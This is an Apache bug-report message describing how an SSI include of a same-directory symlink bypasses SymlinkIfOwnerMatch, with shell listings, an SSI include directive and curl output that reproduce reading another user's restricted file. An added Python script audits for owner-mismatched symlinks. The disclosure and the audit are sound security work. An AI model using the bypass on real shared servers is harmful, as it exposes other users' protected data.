httpd-bugs mailing list archives

From bugzi...@apache.org
Subject DO NOT REPLY [Bug 45959] SSI include ignores SymlinkIfOwnerMatch directive
Date Sat, 15 Nov 2008 03:49:34 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=45959





--- Comment #10 from Paul B. Henson <henson@acm.org>  2008-11-14 19:49:33 PST ---
I've done some further testing, and confirmed that this is only a problem if
the included symbolic link is in the same directory as the shtml file.

Consider the following file served via apache:

$ ls -l /export/user/henson/www/
total 2
-rw-------+  1 henson   csupomona      13 Nov 14 19:24 secured.html

For the sake of discussion, assume this file is readable by the web server, but
restricted to require authentication.

Now, another user creates a symbolic link to that file:

$ ls -l /export/user/astudent/www/symlink.html
lrwxrwxrwx 1 astudent csupomona 36 Nov 14 19:31 /export/user/astudent/www/symlink.html -> /export/user/henson/www/secured.html


Attempting to access the symbolic link directly fails, as SymlinkIfOwnerMatch
is configured:

$ curl http://stan.unx.csupomona.edu/~astudent/symlink.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /~astudent/symlink.html
on this server.</p>
</body></html>


[Fri Nov 14 19:29:06 2008] [error] [client 134.71.248.140] Symbolic link not allowed or link target not accessible: /export/user/astudent/www/symlink.html

Now, the user creates an SSI file:

$ ls -l /export/user/astudent/www/symlink_ssi.html

-rw-r--r--+ 1 astudent csupomona 40 Nov 14 19:27 /export/user/astudent/www/symlink_ssi.shtml

Whose contents are:

$ cat /export/user/astudent/www/symlink_ssi.shtml
<!--#include virtual="/~astudent/symlink.html" -->

Accessing this file:

$ curl http://stan.unx.csupomona.edu/~astudent/symlink_ssi.shtml
Secret data.

Returns the restricted data, bypassing the SymlinkIfOwnerMatch configuration
directive.

As I discovered, this appears to be a bug in ap_directory_walk. Let's say we
move the SSI file to a subdirectory:

$ ls -l /export/user/astudent/www/subdir/symlink_ssi.shtml
-rw-r--r--+  1 astudent csupomona      40 Nov 14 19:27 /export/user/astudent/www/subdir/symlink_ssi.shtml


Attempting to request it then fails as expected:

$ curl http://stan.unx.csupomona.edu/~astudent/subdir/symlink_ssi.shtml
[an error occurred while processing this directive]

[Fri Nov 14 19:37:04 2008] [error] [client 134.71.248.140] Symbolic link not allowed or link target not accessible: /export/user/astudent/www/symlink.html
[Fri Nov 14 19:37:04 2008] [error] [client 134.71.248.140] unable to include "/~astudent/symlink.html" in parsed file /export/user/astudent/www/subdir/symlink_ssi.shtml


The exact same include behaves differently depending on whether or not the
included file happens to be in the same directory as the SSI.

Again, this would appear to be a security bug to me. Not a critical one by any
means, but still a security bug. I would greatly appreciate some feedback from
a developer on this issue.


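The ownership comparison that SymlinkIfOwnerMatch is expected to enforce can also be audited directly on disk, independent of which request path reaches the file. This is an added example, not part of the original message or of Apache's code; the function name is hypothetical, and as a simplifying assumption it compares only the link's owner with the final target's owner.

```python
import os
import stat as statmod
import sys


def owner_mismatched_symlinks(root, lstat=os.lstat, stat=os.stat):
    """List symlinks under root whose target is owned by a different uid.

    Returns sorted (link_path, resolved_target, link_uid, target_uid) tuples;
    target_uid is None when the target cannot be stat'ed (dangling link).
    lstat/stat are injectable so the check can be exercised without root.
    """
    findings = []
    # followlinks=False: report links to directories, but never descend into them.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            link_info = lstat(path)  # describes the link itself
            if not statmod.S_ISLNK(link_info.st_mode):
                continue
            try:
                target_uid = stat(path).st_uid  # follows the link to its target
            except OSError:
                target_uid = None  # dangling or inaccessible target
            if target_uid != link_info.st_uid:
                findings.append(
                    (path, os.path.realpath(path), link_info.st_uid, target_uid)
                )
    return sorted(findings)


if __name__ == "__main__":
    # Assumed usage: pass a user web root such as the ~user/www directories
    # shown in the message; defaults to the current directory.
    web_root = sys.argv[1] if len(sys.argv) > 1 else "."
    for link, target, link_uid, target_uid in owner_mismatched_symlinks(web_root):
        print(f"{link} (uid {link_uid}) -> {target} (uid {target_uid})")
```

Any link it reports is one the web server should refuse to follow under an owner-match policy, so a successful response for such a path is worth investigating.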